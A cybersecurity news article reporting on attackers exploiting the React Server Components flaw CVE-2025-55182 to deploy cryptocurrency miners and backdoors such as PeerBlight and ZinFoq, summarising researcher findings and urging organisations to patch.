React2Shell exploitation continues to escalate as actors take advantage of a maximum severity flaw identified in React Server Components, enabling the delivery of cryptocurrency miners and several newly observed malware families. Huntress research indicates that this surge in exploitation is tied to CVE-2025-55182, a critical vulnerability that allows unauthenticated remote code execution across vulnerable systems. The company reported attempts against numerous organizations as of December 8, 2025, with construction and entertainment sectors particularly affected. Among the malware deployed are PeerBlight, a Linux backdoor, CowTunnel, a reverse proxy tunnel, and ZinFoq, a Go-based post exploitation implant. Huntress noted that initial exploitation attempts were detected on December 4, 2025, when an unidentified actor targeted a Windows endpoint by exploiting a susceptible Next.js instance to deploy a shell script, a cryptocurrency miner, and a Linux backdoor. The discovery highlights the scale at which attackers are seeking to compromise both Linux and Windows systems without differentiating between operating environments.
Further observations revealed instances where actors executed discovery commands and attempted to pull several payloads from command and control infrastructure. Attackers also targeted Linux systems for deployment of the XMRig cryptocurrency miner while relying on a publicly available GitHub tool to scan for vulnerable Next.js implementations before launching intrusion activity. Huntress researchers stated that identical patterns were repeatedly seen across impacted endpoints, including matching vulnerability probes and shell code tests. This suggests extensive use of automated exploitation tools that execute payloads indiscriminately, even attempting to deploy Linux specific tools onto Windows devices. The payloads observed included scripts such as sex.sh, which retrieves XMRig from GitHub, and d5.sh, a dropper responsible for initiating the Sliver command and control framework, along with variants such as fn22.sh that incorporate self updating mechanisms. Additionally, wocaosinm.sh, a variation of the Kaiji DDoS malware, brought remote administration and persistence enhancements that added to the complexity of the threat environment.
PeerBlight stands out due to its capacity to maintain communication with a hard-coded command and control server and its use of multiple fallback channels. It installs persistence through a systemd service and adopts the appearance of a legitimate daemon process to evade detection. The backdoor integrates a domain generation algorithm and leverages the BitTorrent Distributed Hash Table network, registering nodes identifiable through a specific prefix to locate peers within the botnet. Huntress identified more than sixty nodes tied to this activity while noting that information sharing between nodes only occurs under strict conditions and at a limited probability to avoid generating detectable network patterns. ZinFoq exhibits similar sophistication with capabilities that allow command execution, directory enumeration, file manipulation, payload retrieval, system data exfiltration, and proxy operations. To reduce detection, ZinFoq removes bash history entries and disguises itself as one of several standard Linux services.
Organizations using react server dom implementations such as webpack, parcel, or turbopack have been strongly advised to update their systems without delay given the ease with which this vulnerability can be exploited. Shadowserver data recorded more than 165,000 IP addresses and over 644,000 domains with exposed code as of December 8, 2025, with high concentrations in the United States, Germany, France, and India. Additional findings released on December 10, 2025 by Palo Alto Networks Unit 42 revealed activity overlapping with the Contagious Interview campaign deploying EtherRAT, along with BPFDoor and Auto Color malware families. Over fifty organizations across financial services, education, consulting, media, telecommunications, government and multiple other sectors have been impacted, with wide geographic distribution across the United States, Asia, South America, and the Middle East. Analysts from firms including Wiz, Rapid7, and VulnCheck noted that exploitation is advancing across multiple attacker clusters, from opportunistic miners to highly capable groups adapting the flaw into broader attack operations. They stressed the urgent need for patching and the importance of preparing for ongoing payload modifications as exploitation persists across the global threat landscape.
Follow the SPIN IDG WhatsApp Channel for updates across the Smart Pakistan Insights Network covering all of Pakistan’s technology ecosystem.
